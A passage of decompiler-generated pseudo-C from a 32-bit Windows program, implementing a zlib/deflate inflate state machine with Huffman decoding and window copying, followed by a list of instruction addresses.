									_push(_t671 - 0x14);
									_push(0x40ab58);
									_push(0x40ab18);
									_push(0x101);
									_push(_t670);
									_push( &(_t583[3]));
									 *(_t671 - 4) = 9;
									 *(_t671 - 0xc) = 6;
									_t564 = E0040737E(_t671 - 4);
									if( *(_t671 - 4) == 0) {
										_t564 = _t564 | 0xffffffff;
									}
									if(_t564 != 0) {
										goto L200;
									} else {
										L102:
										_push(_t671 - 8);
										_push( &(_t583[0x148]));
										_push(_t671 - 0x18);
										_push(0x40abd4);
										_push(0x40ab98);
										_push(0);
										_push( *((intOrPtr*)(_t671 - 0x10)));
										_push(_t583 + 0xc + _t670 * 4);
										if(E0040737E(_t671 - 0xc) != 0) {
											goto L200;
										}
										L103:
										_t571 =  *(_t671 - 0xc);
										if(_t571 != 0 || _t670 <= 0x101) {
											L105:
											 *_t583 =  *_t583 & 0x00000000;
											_t583[4] = _t571;
											_t583[5] =  *(_t671 - 0x14);
											_t583[4] =  *(_t671 - 4);
											_t583[6] =  *(_t671 - 0x18);
											L107:
											_t583[3] = _t583[4] & 0x000000ff;
											_t583[2] = _t583[5];
											 *_t583 = 1;
											L109:
											_t576 = _t583[3];
											L112:
											while(_t647 < _t576) {
												_t655 = 0;
												if( *(_t671 - 0x30) == 0) {
													goto L198;
												}
												L111:
												 *(_t671 - 0x30) =  *(_t671 - 0x30) - 1;
												 *(_t671 - 0x3c) =  *(_t671 - 0x3c) | ( *( *(_t671 - 0x34)) & 0x000000ff) << _t647;
												 *(_t671 - 0x34) =  &(( *(_t671 - 0x34))[1]);
												_t647 = _t647 + 8;
											}
											_t579 = _t583[2] + ( *(0x40c0a8 + _t576 * 2) & 0x0000ffff &  *(_t671 - 0x3c)) * 4;
											_t631 = _t579[1] & 0x000000ff;
											 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> _t631;
											_t650 = _t647 - _t631;
											_t632 =  *_t579 & 0x000000ff;
											 *(_t671 - 0x38) = _t650;
											if(_t632 != 0) {
												L115:
												if((_t632 & 0x00000010) == 0) {
													L117:
													if((_t632 & 0x00000040) != 0) {
														L119:
														if((_t632 & 0x00000020) == 0) {
															L193:
															_t583[0x147] =  *(_t671 - 0x3c);
															 *_t583 = 0x11;
															_t583[0x146] = _t650;
															( *(_t671 + 8))[1] =  *(_t671 - 0x30);
															L201:
															 *(_t671 - 4) =  *(_t671 - 4) | 0xffffffff;
															goto L199;
														}
														L120:
														 *_t583 = 7;
														while(1) {
															L191:
															_t513 =  *_t583;
															if(_t513 > 0xf) {
																break;
															}
															L1:
															switch( *((intOrPtr*)(_t513 * 4 +  &M0040820C))) {
																case 0:
																	L106:
																	__edi =  *(__ebp - 0x38);
																	goto L107;
																case 1:
																	L108:
																	__edi =  *(__ebp - 0x38);
																	goto L109;
																case 2:
																	L121:
																	__eax = __ebx[2];
																	__edi =  *(__ebp - 0x38);
																	while(1) {
																		L124:
																		__eflags = __edi - __eax;
																		if(__edi >= __eax) {
																			break;
																		}
																		L122:
																		__esi = 0;
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) == 0) {
																			goto L198;
																		}
																		L123:
																		__ecx =  *(__ebp - 0x34);
																		__edx =  *( *(__ebp - 0x34)) & 0x000000ff;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																		__ecx = __edi;
																		__edx = ( *( *(__ebp - 0x34)) & 0x000000ff) << __cl;
																		 *(__ebp - 0x3c) =  *(__ebp - 0x3c) | __edx;
																		 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
																		__edi = __edi + 8;
																		__eflags = __edi;
																	}
																	L125:
																	 *(0x40c0a8 + __eax * 2) & 0x0000ffff =  *(0x40c0a8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x3c);
																	__ebx[1] = __ebx[1] + ( *(0x40c0a8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x3c));
																	__ecx = __eax;
																	 *(__ebp - 0x3c) =  *(__ebp - 0x3c) >> __cl;
																	__edi = __edi - __eax;
																	__eax = __ebx[4] & 0x000000ff;
																	__ebx[3] = __ebx[4] & 0x000000ff;
																	__eax = __ebx[6];
																	__ebx[2] = __ebx[6];
																	 *__ebx = 3;
																	goto L127;
																case 3:
																	L126:
																	__edi =  *(__ebp - 0x38);
																	L127:
																	__eax = __ebx[3];
																	while(1) {
																		L130:
																		__eflags = __edi - __eax;
																		if(__edi >= __eax) {
																			break;
																		}
																		L128:
																		__esi = 0;
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) == 0) {
																			goto L198;
																		}
																		L129:
																		__ecx =  *(__ebp - 0x34);
																		__edx =  *( *(__ebp - 0x34)) & 0x000000ff;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																		__ecx = __edi;
																		__edx = ( *( *(__ebp - 0x34)) & 0x000000ff) << __cl;
																		 *(__ebp - 0x3c) =  *(__ebp - 0x3c) | __edx;
																		 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
																		__edi = __edi + 8;
																		__eflags = __edi;
																	}
																	L131:
																	__eax =  *(0x40c0a8 + __eax * 2) & 0x0000ffff;
																	__eax = __eax &  *(__ebp - 0x3c);
																	__ecx = __ebx[2];
																	__eax = __ebx[2] + __eax * 4;
																	__ecx =  *(__eax + 1) & 0x000000ff;
																	 *(__ebp - 0x3c) =  *(__ebp - 0x3c) >> __cl;
																	__edi = __edi - ( *(__eax + 1) & 0x000000ff);
																	__ecx =  *__eax & 0x000000ff;
																	 *(__ebp - 0x38) = __edi;
																	__eflags = __cl & 0x00000010;
																	if((__cl & 0x00000010) == 0) {
																		L133:
																		__eflags = __cl & 0x00000040;
																		if((__cl & 0x00000040) != 0) {
																			goto L193;
																		}
																		L134:
																		goto L118;
																	}
																	L132:
																	__ebx[2] = __ecx;
																	__eax =  *(__eax + 2) & 0x0000ffff;
																	__ebx[3] = __eax;
																	 *__ebx = 4;
																	goto L191;
																case 4:
																	L135:
																	__eax = __ebx[2];
																	__edi =  *(__ebp - 0x38);
																	while(1) {
																		L138:
																		__eflags = __edi - __eax;
																		if(__edi >= __eax) {
																			break;
																		}
																		L136:
																		__esi = 0;
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) == 0) {
																			goto L198;
																		}
																		L137:
																		__ecx =  *(__ebp - 0x34);
																		__esi =  *( *(__ebp - 0x34)) & 0x000000ff;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																		__ecx = __edi;
																		__esi = ( *( *(__ebp - 0x34)) & 0x000000ff) << __cl;
																		 *(__ebp - 0x3c) =  *(__ebp - 0x3c) | ( *( *(__ebp - 0x34)) & 0x000000ff) << __cl;
																		 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
																		__edi = __edi + 8;
																		__eflags = __edi;
																	}
																	L139:
																	 *(0x40c0a8 + __eax * 2) & 0x0000ffff =  *(0x40c0a8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x3c);
																	__ebx[3] = __ebx[3] + ( *(0x40c0a8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x3c));
																	__ecx = __eax;
																	 *(__ebp - 0x3c) =  *(__ebp - 0x3c) >> __cl;
																	__edi = __edi - __eax;
																	__eflags = __edi;
																	 *(__ebp - 0x38) = __edi;
																	 *__ebx = 5;
																	goto L140;
																case 5:
																	L140:
																	__eax = __ebx[3];
																	__edx = __edx - __ebx;
																	__ecx = __edx - __ebx - 0x1ba0;
																	__eflags = __edx - __ebx - 0x1ba0 - __eax;
																	if(__edx - __ebx - 0x1ba0 >= __eax) {
																		__edi = __edx;
																		__edi = __edx - __eax;
																	} else {
																		__ebx[0x26e8] = __ebx[0x26e8] - __eax;
																		__ecx = __ebx[0x26e8] - __eax - __ebx;
																		__edi = __ebx[0x26e8] - __eax - __ebx + __edx - 0x1ba0;
																	}
																	while(1) {
																		L163:
																		__esi = 0;
																		__eflags = __ebx[1];
																		if(__ebx[1] == 0) {
																			break;
																		}
																		L143:
																		__eflags =  *(__ebp - 0x28);
																		if( *(__ebp - 0x28) != 0) {
																			L160:
																			__edx =  *(__ebp - 0x2c);
																			 *__edx =  *__edi;
																			__edx = __edx + 1;
																			__edi = __edi + 1;
																			 *(__ebp - 0x28) =  *(__ebp - 0x28) - 1;
																			 *(__ebp - 0x2c) = __edx;
																			__eflags = __edi - __ebx[0x26e8];
																			if(__edi == __ebx[0x26e8]) {
																				__edi =  &(__ebx[0x6e8]);
																			}
																			_t375 =  &(__ebx[1]);
																			 *_t375 = __ebx[1] - 1;
																			__eflags =  *_t375;
																			continue;
																		}
																		L144:
																		__ecx = __ebx[0x26e8];
																		__eflags = __edx - __ecx;
																		if(__edx != __ecx) {
																			L150:
																			__eax =  *(__ebp - 0x2c);
																			__esi =  *(__ebp + 8);
																			__ebx[0x26ea] =  *(__ebp - 0x2c);
																			__eax = E0040731E( *(__ebp + 8));
																			__esi = __ebx[0x26ea];
																			__ecx = __ebx[0x26e9];
																			 *(__ebp - 0x2c) = __esi;
																			__eflags = __esi - __ecx;
																			if(__esi >= __ecx) {
																				__eax = __ebx[0x26e8];
																				__eax = __ebx[0x26e8] - __esi;
																				__eflags = __eax;
																			} else {
																				__ecx = __ecx - __esi;
																				__eax = __ecx - __esi - 1;
																			}
																			__edx = __ebx[0x26e8];
																			 *(__ebp - 0x28) = __eax;
																			__eflags = __esi - __edx;
																			if(__esi == __edx) {
																				__esi =  &(__ebx[0x6e8]);
																				__eflags = __esi - __ecx;
																				if(__eflags != 0) {
																					 *(__ebp - 0x2c) = __esi;
																					if(__eflags >= 0) {
																						__edx = __edx - __esi;
																						__eflags = __edx;
																						__eax = __edx;
																					} else {
																						__eax = __ecx - 1;
																					}
																					 *(__ebp - 0x28) = __eax;
																				}
																			}
																			__eflags = __eax;
																			if(__eax == 0) {
																				L202:
																				__eax =  *(__ebp - 0x3c);
																				__ecx =  *(__ebp + 8);
																				__ebx[0x147] =  *(__ebp - 0x3c);
																				__eax =  *(__ebp - 0x38);
																				__ebx[0x146] =  *(__ebp - 0x38);
																				__eax =  *(__ebp - 0x30);
																				 *( *(__ebp + 8) + 4) =  *(__ebp - 0x30);
																				goto L203;
																			} else {
																				goto L160;
																			}
																		}
																		L145:
																		__eax = __ebx[0x26e9];
																		__edx =  &(__ebx[0x6e8]);
																		__eflags = __edx - __eax;
																		if(__eflags == 0) {
																			goto L150;
																		}
																		L146:
																		 *(__ebp - 0x2c) = __edx;
																		if(__eflags >= 0) {
																			__ecx = __ecx - __edx;
																			__eflags = __ecx;
																			 *(__ebp - 0x28) = __ecx;
																		} else {
																			__eax = __eax - __edx;
																			__eax = __eax - 1;
																			 *(__ebp - 0x28) = __eax;
																		}
																		__eflags =  *(__ebp - 0x28) - __esi;
																		if( *(__ebp - 0x28) != __esi) {
																			goto L160;
																		} else {
																			goto L150;
																		}
																	}
																	L164:
																	 *__ebx = 0;
																	goto L191;
																case 6:
																	L165:
																	__eflags =  *(__ebp - 0x28);
																	if( *(__ebp - 0x28) != 0) {
																		L182:
																		__ecx =  *(__ebp - 0x2c);
																		 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
																		_t404 = __ebp - 0x28;
																		 *_t404 =  *(__ebp - 0x28) - 1;
																		__eflags =  *_t404;
																		 *( *(__ebp - 0x2c)) = __ebx[2];
																		goto L183;
																	}
																	L166:
																	__ecx = __ebx[0x26e8];
																	__eflags =  *(__ebp - 0x2c) - __ecx;
																	if( *(__ebp - 0x2c) != __ecx) {
																		L172:
																		__eax =  *(__ebp - 0x2c);
																		__esi =  *(__ebp + 8);
																		__ebx[0x26ea] =  *(__ebp - 0x2c);
																		__eax = E0040731E(__esi);
																		__edi = __ebx[0x26ea];
																		__ecx = __ebx[0x26e9];
																		 *(__ebp - 0x2c) = __edi;
																		__eflags = __edi - __ecx;
																		if(__edi >= __ecx) {
																			__eax = __ebx[0x26e8];
																			__eax = __ebx[0x26e8] - __edi;
																			__eflags = __eax;
																		} else {
																			__ecx = __ecx - __edi;
																			__eax = __ecx - __edi - 1;
																		}
																		__edx = __ebx[0x26e8];
																		 *(__ebp - 0x28) = __eax;
																		__eflags = __edi - __edx;
																		if(__edi == __edx) {
																			__edi =  &(__ebx[0x6e8]);
																			__eflags = __edi - __ecx;
																			if(__eflags != 0) {
																				 *(__ebp - 0x2c) = __edi;
																				if(__eflags >= 0) {
																					__edx = __edx - __edi;
																					__eflags = __edx;
																					__eax = __edx;
																				} else {
																					__eax = __ecx - 1;
																				}
																				 *(__ebp - 0x28) = __eax;
																			}
																		}
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L204;
																		} else {
																			goto L182;
																		}
																	}
																	L167:
																	__eax = __ebx[0x26e9];
																	__edx =  &(__ebx[0x6e8]);
																	__eflags = __edx - __eax;
																	if(__eflags == 0) {
																		goto L172;
																	}
																	L168:
																	 *(__ebp - 0x2c) = __edx;
																	if(__eflags >= 0) {
																		__ecx = __ecx - __edx;
																		__eflags = __ecx;
																		 *(__ebp - 0x28) = __ecx;
																	} else {
																		__eax = __eax - __edx;
																		__eax = __eax - 1;
																		 *(__ebp - 0x28) = __eax;
																	}
																	__eflags =  *(__ebp - 0x28);
																	if( *(__ebp - 0x28) != 0) {
																		goto L182;
																	} else {
																		goto L172;
																	}
																case 7:
																	L184:
																	__eflags =  *(__ebp - 0x38) - 7;
																	if( *(__ebp - 0x38) > 7) {
																		 *(__ebp - 0x38) =  *(__ebp - 0x38) - 8;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) + 1;
																		_t411 = __ebp - 0x34;
																		 *_t411 =  *(__ebp - 0x34) - 1;
																		__eflags =  *_t411;
																	}
																	goto L186;
																case 8:
																	L3:
																	_t649 =  *(_t671 - 0x38);
																	while(1) {
																		L6:
																		__eflags = _t649 - 3;
																		if(_t649 >= 3) {
																			break;
																		}
																		L4:
																		__eflags =  *(_t671 - 0x30);
																		if( *(_t671 - 0x30) == 0) {
																			goto L194;
																		} else {
																			 *(_t671 - 0x30) =  *(_t671 - 0x30) - 1;
																			 *(_t671 - 0x3c) =  *(_t671 - 0x3c) | ( *( *(_t671 - 0x34)) & 0x000000ff) << _t649;
																			 *(_t671 - 0x34) =  &(( *(_t671 - 0x34))[1]);
																			_t649 = _t649 + 8;
																			__eflags = _t649;
																			 *(_t671 - 0x38) = _t649;
																			continue;
																		}
																	}
																	L7:
																	 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> 3;
																	_t523 =  *(_t671 - 0x3c) & 0x00000007;
																	_t650 = _t649 - 3;
																	asm("sbb ecx, ecx");
																	_t659 = 0;
																	_t525 = _t523 >> 1;
																	__eflags = _t525;
																	 *(_t671 - 0x38) = _t650;
																	_t583[0x145] = ( ~(_t523 & 1) & 0x00000007) + 8;
																	if(_t525 == 0) {
																		L23:
																		_t603 = _t650 & 0x00000007;
																		 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> _t603;
																		 *(_t671 - 0x38) = _t650 - _t603;
																		 *_t583 = 9;
																		goto L191;
																	}
																	L8:
																	_t526 = _t525 - 1;
																	__eflags = _t526;
																	if(_t526 == 0) {
																		L13:
																		__eflags =  *0x46d200;
																		if( *0x46d200 != 0) {
																			L22:
																			_t583[4] =  *0x40c0cc;
																			_t583[4] =  *0x40c0d0;
																			_t583[5] =  *0x46c078;
																			_t583[6] =  *0x46c07c;
																			L183:
																			 *_t583 =  *_t583 & 0x00000000;
																			goto L191;
																		} else {
																			 *(_t671 - 4) = 0;
																			do {
																				L15:
																				_t605 = 8;
																				__eflags = _t659 - 0x8f;
																				if(_t659 > 0x8f) {
																					__eflags = _t659 - 0x100;
																					if(_t659 >= 0x100) {
																						__eflags = _t659 - 0x118;
																						if(_t659 < 0x118) {
																							_t605 = 7;
																						}
																					} else {
																						_t605 = 9;
																					}
																				}
																				L20:
																				 *((intOrPtr*)(0x46c500 + _t659 * 4)) = _t605;
																				_t659 = _t659 + 1;
																				__eflags = _t659 - 0x120;
																			} while (_t659 < 0x120);
																			_push(_t671 - 4);
																			_push(0x46c980);
																			_push(0x46c078);
																			_push(0x40ab58);
																			_push(0x40ab18);
																			_push(0x101);
																			_push(0x120);
																			_push(0x46c500);
																			E0040737E(0x40c0cc);
																			_push(0x1e);
																			_pop(_t608);
																			_push(5);
																			_pop(_t534);
																			memset(0x46c500, _t534, _t608 << 2);
																			_t673 = _t673 + 0xc;
																			_push(_t671 - 4);
																			_push(0x46c980);
																			_push(0x46c07c);
																			_push(0x40abd4);
																			_push(0x40ab98);
																			_push(0);
																			_push(0x1e);
																			_push(0x46c500);
																			E0040737E(0x40c0d0);
																			 *0x46d200 = 1;
																			goto L22;
																		}
																	}
																	L9:
																	_t539 = _t526 - 1;
																	__eflags = _t539;
																	if(_t539 == 0) {
																		 *_t583 = 0xb;
																		goto L191;
																	}
																	L10:
																	__eflags = _t539 == 1;
																	if(_t539 == 1) {
																		goto L193;
																	} else {
																		goto L191;
																	}
																case 9:
																	L24:
																	__ecx =  *(__ebp - 0x38);
																	while(1) {
																		L27:
																		__eflags = __ecx - 0x10;
																		if(__ecx >= 0x10) {
																			break;
																		}
																		L25:
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) == 0) {
																			goto L194;
																		}
																		L26:
																		 *(__ebp - 0x34) =  *( *(__ebp - 0x34)) & 0x000000ff;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																		__eax = ( *( *(__ebp - 0x34)) & 0x000000ff) << __cl;
																		 *(__ebp - 0x3c) =  *(__ebp - 0x3c) | ( *( *(__ebp - 0x34)) & 0x000000ff) << __cl;
																		 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
																		__ecx = __ecx + 8;
																		__eflags = __ecx;
																		 *(__ebp - 0x38) = __ecx;
																	}
																	L28:
																	__eax =  *(__ebp - 0x3c) & 0x0000ffff;
																	__ebx[1] =  *(__ebp - 0x3c) & 0x0000ffff;
																	__eax = 0;
																	 *(__ebp - 0x38) = 0;
																	 *(__ebp - 0x3c) = 0;
																	__eflags = __ebx[1];
																	if(__ebx[1] == 0) {
																		goto L30;
																	}
																	L29:
																	_push(0xa);
																	_pop(__eax);
																	goto L31;
																case 0xa:
																	L32:
																	__esi = 0;
																	__eflags =  *(__ebp - 0x30);
																	if( *(__ebp - 0x30) == 0) {
																		L194:
																		_t658 =  *(_t671 + 8);
																		_t583[0x147] =  *(_t671 - 0x3c);
																		_t583[0x146] =  *(_t671 - 0x38);
																		_t434 =  &(_t658[1]);
																		 *_t434 = _t658[1] & 0x00000000;
																		__eflags =  *_t434;
																		L195:
																		 *_t658 =  *(_t671 - 0x34);
																		_t583[0x26ea] =  *(_t671 - 0x2c);
																		E0040731E(_t658);
																		_t492 = 0;
																		__eflags = 0;
																		goto L196;
																	}
																	L33:
																	__eflags =  *(__ebp - 0x28);
																	if( *(__ebp - 0x28) != 0) {
																		L50:
																		__eax =  *(__ebp - 0x28);
																		__esi = __eax;
																		__eflags = __eax -  *(__ebp - 0x30);
																		if(__eax >=  *(__ebp - 0x30)) {
																			__esi =  *(__ebp - 0x30);
																		}
																		__eax = __ebx[1];
																		__eflags = __eax - __esi;
																		if(__eax < __esi) {
																			__esi = __eax;
																		}
																		__eax = E00405E38( *(__ebp - 0x2c),  *(__ebp - 0x34), __esi);
																		 *(__ebp - 0x34) =  *(__ebp - 0x34) + __esi;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) - __esi;
																		 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + __esi;
																		 *(__ebp - 0x28) =  *(__ebp - 0x28) - __esi;
																		_t85 =  &(__ebx[1]);
																		 *_t85 = __ebx[1] - __esi;
																		__eflags =  *_t85;
																		if( *_t85 == 0) {
																			L55:
																			L30:
																			__eax = __ebx[0x145];
																			L31:
																			 *__ebx = __eax;
																		}
																		goto L191;
																	}
																	L34:
																	__ecx = __ebx[0x26e8];
																	__eflags = __edx - __ecx;
																	if(__edx != __ecx) {
																		L40:
																		__eax =  *(__ebp - 0x2c);
																		__esi =  *(__ebp + 8);
																		__ebx[0x26ea] =  *(__ebp - 0x2c);
																		__eax = E0040731E( *(__ebp + 8));
																		__esi = __ebx[0x26ea];
																		__ecx = __ebx[0x26e9];
																		 *(__ebp - 0x2c) = __esi;
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			__eax = __ebx[0x26e8];
																			__eax = __ebx[0x26e8] - __esi;
																			__eflags = __eax;
																		} else {
																			__ecx = __ecx - __esi;
																			__eax = __ecx - __esi - 1;
																		}
																		__edx = __ebx[0x26e8];
																		 *(__ebp - 0x28) = __eax;
																		__eflags = __esi - __edx;
																		if(__esi == __edx) {
																			__esi =  &(__ebx[0x6e8]);
																			__eflags = __esi - __ecx;
																			if(__eflags != 0) {
																				 *(__ebp - 0x2c) = __esi;
																				if(__eflags >= 0) {
																					__edx = __edx - __esi;
																					__eflags = __edx;
																					__eax = __edx;
																				} else {
																					__eax = __ecx - 1;
																				}
																				 *(__ebp - 0x28) = __eax;
																			}
																		}
																		__eflags = __eax;
																		if(__eax == 0) {
																			L197:
																			__eax =  *(__ebp - 0x3c);
																			__esi =  *(__ebp + 8);
																			__ebx[0x147] =  *(__ebp - 0x3c);
																			__eax =  *(__ebp - 0x38);
																			__ebx[0x146] =  *(__ebp - 0x38);
																			__eax =  *(__ebp - 0x30);
																			 *(__esi + 4) =  *(__ebp - 0x30);
																			goto L195;
																		} else {
																			goto L50;
																		}
																	}
																	L35:
																	__eax = __ebx[0x26e9];
																	__edx =  &(__ebx[0x6e8]);
																	__eflags = __edx - __eax;
																	if(__eflags == 0) {
																		goto L40;
																	}
																	L36:
																	 *(__ebp - 0x2c) = __edx;
																	if(__eflags >= 0) {
																		__ecx = __ecx - __edx;
																		__eflags = __ecx;
																		 *(__ebp - 0x28) = __ecx;
																	} else {
																		__eax = __eax - __edx;
																		 *(__ebp - 0x28) = __eax;
																	}
																	__eflags =  *(__ebp - 0x28) - __esi;
																	if( *(__ebp - 0x28) != __esi) {
																		goto L50;
																	} else {
																		goto L40;
																	}
																case 0xb:
																	goto L0;
																case 0xc:
																	L62:
																	__edi =  *(__ebp - 0x38);
																	goto L69;
																case 0xd:
																	L77:
																	__edi =  *(__ebp - 0x38);
																	goto L98;
																case 0xe:
																	goto L192;
																case 0xf:
																	L186:
																	__eax =  *(__ebp - 0x2c);
																	__esi =  *(__ebp + 8);
																	__ebx[0x26ea] =  *(__ebp - 0x2c);
																	__eax = E0040731E(__esi);
																	__ecx = __ebx[0x26ea];
																	__edx = __ebx[0x26e9];
																	 *(__ebp - 0x2c) = __ecx;
																	__eflags = __ecx - __edx;
																	if(__ecx >= __edx) {
																		__eax = __ebx[0x26e8];
																		__eax = __ebx[0x26e8] - __ecx;
																		__eflags = __eax;
																	} else {
																		__edx = __edx - __ecx;
																		__eax = __edx - __ecx - 1;
																	}
																	 *(__ebp - 0x28) = __eax;
																	__eflags = __ecx - __edx;
																	if(__ecx != __edx) {
																		L204:
																		__eax =  *(__ebp - 0x3c);
																		__ebx[0x147] =  *(__ebp - 0x3c);
																		__eax =  *(__ebp - 0x38);
																		__ebx[0x146] =  *(__ebp - 0x38);
																		__eax =  *(__ebp - 0x30);
																		 *(__esi + 4) =  *(__ebp - 0x30);
																		L203:
																		 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
																		goto L199;
																	} else {
																		L190:
																		__eax = __ebx[0x145];
																		 *__ebx = __eax;
																		__eflags = __eax - 8;
																		if(__eax != 8) {
																			L205:
																			__eax =  *(__ebp - 0x3c);
																			__ebx[0x147] =  *(__ebp - 0x3c);
																			__eax =  *(__ebp - 0x38);
																			__ebx[0x146] =  *(__ebp - 0x38);
																			__eax =  *(__ebp - 0x30);
																			 *(__esi + 4) =  *(__ebp - 0x30);
																			 *(__ebp - 4) = 1;
																			goto L199;
																		}
																		goto L191;
																	}
															}
														}
														L192:
														_t650 =  *(_t671 - 0x38);
														goto L193;
													}
													L118:
													_t583[3] = _t632;
													_t583[2] = _t579 + (_t579[2] & 0x0000ffff) * 4;
													goto L191;
												}
												L116:
												_t583[2] = _t632 & 0x0000000f;
												_t583[1] = _t579[2] & 0x0000ffff;
												 *_t583 = 2;
												goto L191;
											}
											L114:
											_t583[2] = _t579[2] & 0x0000ffff;
											 *_t583 = 6;
											goto L191;
										} else {
											goto L200;
										}
									}
								}
							}
							if(_t647 >= 3) {
								L67:
								_t112 = _t583[2] + 0x40ab04; // 0x121110
								 *(_t671 - 0x3c) =  *(_t671 - 0x3c) >> 3;
								 *(_t583 + 0xc +  *_t112 * 4) =  *(_t671 - 0x3c) & 0x00000007;
								_t583[2] = _t583[2] + 1;
								_t647 = _t647 - 3;
								L68:
								 *(_t671 - 0x38) = _t647;
								goto L69;
							}
							L64:
							_t655 = 0;
							while(1) {
								L65:
								if( *(_t671 - 0x30) == _t655) {
									goto L198;
								}
								L66:
								 *(_t671 - 0x30) =  *(_t671 - 0x30) - 1;
								_t508 = ( *( *(_t671 - 0x34)) & 0x000000ff) << _t647;
								_t647 = _t647 + 8;
								 *(_t671 - 0x3c) =  *(_t671 - 0x3c) | _t508;
								 *(_t671 - 0x34) =  &(( *(_t671 - 0x34))[1]);
								if(_t647 < 3) {
									continue;
								}
								goto L67;
							}
							goto L198;
						}
					}
				}
			}

































                                                                                                                                                    0x004079a2
                                                                                                                                                    0x004079a2
                                                                                                                                                    0x004079a2
                                                                                                                                                    0x004079a2
                                                                                                                                                    0x004079a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004079c8
                                                                                                                                                    0x004079a7
                                                                                                                                                    0x004079ac
                                                                                                                                                    0x00408156
                                                                                                                                                    0x00408159
                                                                                                                                                    0x00408162
                                                                                                                                                    0x00408168
                                                                                                                                                    0x0040816b
                                                                                                                                                    0x0040816e
                                                                                                                                                    0x00408174
                                                                                                                                                    0x00408179
                                                                                                                                                    0x0040817f
                                                                                                                                                    0x00408184
                                                                                                                                                    0x00408132
                                                                                                                                                    0x00408136
                                                                                                                                                    0x00408136
                                                                                                                                                    0x004079b2
                                                                                                                                                    0x004079b8
                                                                                                                                                    0x004079bf
                                                                                                                                                    0x004079c2
                                                                                                                                                    0x004079c5
                                                                                                                                                    0x004079c5
                                                                                                                                                    0x004079d0
                                                                                                                                                    0x004079da
                                                                                                                                                    0x004079e0
                                                                                                                                                    0x00408189
                                                                                                                                                    0x0040818f
                                                                                                                                                    0x00408198
                                                                                                                                                    0x0040819e
                                                                                                                                                    0x004081a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004079f6
                                                                                                                                                    0x004079f6
                                                                                                                                                    0x004079f6
                                                                                                                                                    0x004079fa
                                                                                                                                                    0x004079fd
                                                                                                                                                    0x00407a01
                                                                                                                                                    0x00407a57
                                                                                                                                                    0x00407a57
                                                                                                                                                    0x00407a57
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407a5a
                                                                                                                                                    0x00407a6a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407a7f
                                                                                                                                                    0x00407a70
                                                                                                                                                    0x00407a77
                                                                                                                                                    0x00407a7c
                                                                                                                                                    0x00407a7c
                                                                                                                                                    0x00407a7c
                                                                                                                                                    0x00407a87
                                                                                                                                                    0x00407a8e
                                                                                                                                                    0x00407a97
                                                                                                                                                    0x00407a98
                                                                                                                                                    0x00407a99
                                                                                                                                                    0x00407a9a
                                                                                                                                                    0x00407a9b
                                                                                                                                                    0x00407a9f
                                                                                                                                                    0x00407aa6
                                                                                                                                                    0x00407ab0
                                                                                                                                                    0x00407ab3
                                                                                                                                                    0x00407aba
                                                                                                                                                    0x00407ad2
                                                                                                                                                    0x00407ad2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407ac4
                                                                                                                                                    0x00407ac4
                                                                                                                                                    0x00407ac4
                                                                                                                                                    0x00407ac7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407bf9
                                                                                                                                                    0x00407ae5
                                                                                                                                                    0x00407b0e
                                                                                                                                                    0x00407b0e
                                                                                                                                                    0x00407b10
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407aed
                                                                                                                                                    0x00407aed
                                                                                                                                                    0x00407af2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407af8
                                                                                                                                                    0x00407afe
                                                                                                                                                    0x00407b05
                                                                                                                                                    0x00407b08
                                                                                                                                                    0x00407b0b
                                                                                                                                                    0x00407b0b
                                                                                                                                                    0x00407b12
                                                                                                                                                    0x00407b23
                                                                                                                                                    0x00407b26
                                                                                                                                                    0x00407b2a
                                                                                                                                                    0x00407b2e
                                                                                                                                                    0x00407b34
                                                                                                                                                    0x00407b4c
                                                                                                                                                    0x00407b4f
                                                                                                                                                    0x00407b5d
                                                                                                                                                    0x00407b60
                                                                                                                                                    0x00407b51
                                                                                                                                                    0x00407b53
                                                                                                                                                    0x00407b54
                                                                                                                                                    0x00407b54
                                                                                                                                                    0x00407b8a
                                                                                                                                                    0x00407b8a
                                                                                                                                                    0x00407b8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407b69
                                                                                                                                                    0x00407b69
                                                                                                                                                    0x00407b6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407b74
                                                                                                                                                    0x00407b7a
                                                                                                                                                    0x00407b81
                                                                                                                                                    0x00407b84
                                                                                                                                                    0x00407b87
                                                                                                                                                    0x00407b87
                                                                                                                                                    0x00407b91
                                                                                                                                                    0x00407b93
                                                                                                                                                    0x00407ba6
                                                                                                                                                    0x00407baa
                                                                                                                                                    0x00407bad
                                                                                                                                                    0x00407bb0
